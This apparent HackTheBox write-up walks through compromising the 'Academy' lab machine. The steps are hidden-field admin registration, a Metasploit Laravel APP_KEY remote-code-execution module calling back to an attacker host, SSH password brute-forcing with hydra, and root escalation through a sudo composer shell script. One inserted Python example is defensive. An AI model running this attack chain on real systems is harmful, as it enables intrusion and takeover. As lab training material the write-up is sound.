Academy-HackTheBox

Sidharth R
Mar 2, 2021

Hey, this is a write-up for the machine ‘Academy’ on HackTheBox.

I started by enumerating the target with nmap, using the following commands:

nmap -p- --min-rate 10000 -oA nmap_all_tcp 10.10.10.215
nmap -p 22,80,33060 -sC -sV 10.10.10.215

This showed three open ports. Since port 80 was open, I thought I might just pay a visit. The website redirected to academy.htb, so I added that domain name for 10.10.10.215 in /etc/hosts.

Whenever I visit a website for CTFs, I always have Burp Suite set up to monitor the requests. On the home page there are two buttons, ‘LOGIN’ and ‘REGISTER’.

I clicked on ‘login’ and tried some of the default credentials, but nothing worked. I also checked the source of the login page but didn’t find anything interesting. Then I registered myself and logged in.

I spent a lot of time analysing the webpage and found nothing. Then I started viewing the page source of every single page and finally found a hidden input field on the registration page.

I opened the inspect element tab, changed the input type to text and the value to 1, and registered another user called ‘boy’.

Nothing happened; I could just log in. But there was something odd about that input tag, so I used wfuzz to fuzz the website using the following command.

wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://academy.htb/FUZZ --hc 404

I visited http://academy.htb/admin.php and tried logging in with default credentials and also with the users that I had created. The second user I created could successfully log in to the admin page.
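The hidden-field behaviour described above comes down to the server trusting a privilege value sent by the browser. The sketch below is an added example, not code from the Academy site; the field names (`uid`, `password`, `role_flag`), the in-memory user store and the audit log are hypothetical, and password storage is left out.

```python
# Added illustration: registration handling with a client-controlled privilege field.
# Field names and the in-memory store are hypothetical, not taken from the target site.

ROLE_USER, ROLE_ADMIN = 0, 1
ALLOWED_FIELDS = {"uid", "password"}  # the only fields a visitor may set


def register_vulnerable(form, users):
    """Trusts every submitted field, including the hidden one."""
    users[form["uid"]] = {"role": int(form.get("role_flag", ROLE_USER))}
    return users[form["uid"]]


def register_hardened(form, users, audit_log):
    """Allow-lists fields, assigns the role server-side and records tampering."""
    unexpected = sorted(set(form) - ALLOWED_FIELDS)
    if unexpected:
        # The hardened form never sends extra fields, so any that arrive
        # are a detection signal worth alerting on.
        audit_log.append({"uid": form.get("uid"), "unexpected_fields": unexpected})
    if form["uid"] in users:
        raise ValueError("user exists")
    users[form["uid"]] = {"role": ROLE_USER}  # role is never read from the request
    return users[form["uid"]]


def can_access_admin(uid, users):
    """Admin page check: the role comes from the server-side record only."""
    return users.get(uid, {}).get("role") == ROLE_ADMIN


def demo():
    # Constructed sample submissions: a normal one and one with the hidden field edited.
    normal = {"uid": "alice", "password": "x"}
    tampered = {"uid": "boy", "password": "x", "role_flag": "1"}
    weak, strong, log = {}, {}, []
    for form in (normal, tampered):
        register_vulnerable(dict(form), weak)
        register_hardened(dict(form), strong, log)
    return {
        "weak_admin": can_access_admin("boy", weak),
        "strong_admin": can_access_admin("boy", strong),
        "alerts": log,
    }


if __name__ == "__main__":
    print(demo())
```

Privileged roles are then granted only through a separate, authenticated administrative path, and the audit log entries give the blue team something to alert on.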

The last row in the table mentions that there is a webpage with some issues. I added that hostname to my /etc/hosts and then visited dev-staging-01.academy.htb.

This website was showing a Laravel error page. Searching the page, I found some interesting variables like app_key and the database username and password.

I tried connecting to the database but couldn’t get a connection. Then I googled whether there is any vulnerability for Laravel and found that some versions have a remote code execution vulnerability. I couldn’t find the version that’s used here, but I thought I would give it a try anyway, so I opened msfconsole and used the following commands.

msfconsole
search laravel
use exploit/unix/http/laravel_token_unserialize_exec
show options
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set rhosts 10.10.10.215
set vhost dev-staging-01.academy.htb
set lhost 10.10.14.31
run

After running the exploit I got a shell.

I shifted to a more stabilised Python shell using the following command.

python3 -c 'import pty; pty.spawn("/bin/sh")'

After looking into a lot of files I found a file ‘.env’.

I still couldn’t connect to the database. Then after many tries I thought I might brute force this password for all the users. After viewing the /home directory, I got the following users

I saved these names in users.txt and saved the password ‘mySup3rP4s5w0rd!!’ in another file, password.txt. Then I used the following hydra command to brute force.

hydra -L users.txt -P password.txt 10.10.10.215 -t 4 ssh

After logging in, I got the user.txt flag.

Privilege Escalation

After logging in as cry0l1t3, I couldn’t get the root flag. I checked almost everything that might contain a password for root or similar things but didn’t get anything. In the meantime I decided to run linpeas.sh on the academy machine. Linux Privilege Escalation Awesome Script (LinPeas) is a script to find out different ways to escalate privileges. I copied linpeas.sh from my local machine using the following command.

scp linpeas.sh cry0l1t3@academy.htb:/tmp

I entered the password for cry0l1t3 and went inside /tmp and ran ./linpeas.sh. It gave me the following output

Then I tried switching to ‘mrb3n’ using the password ‘mrb3n_Ac@d3my!’ and got access. The first thing I did was try accessing the root.txt file, but I still didn’t have permissions. Then I tried ‘sudo -l’ to see the sudo permissions and found this.

I found that mrb3n could run composer. I googled for exploits for it and got the following results.

I visited this website and ran the following commands as ‘mrb3n’ as mentioned there

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

This gave me root access and I could access the root.txt from /root. Happy hacking and thanks for the read.
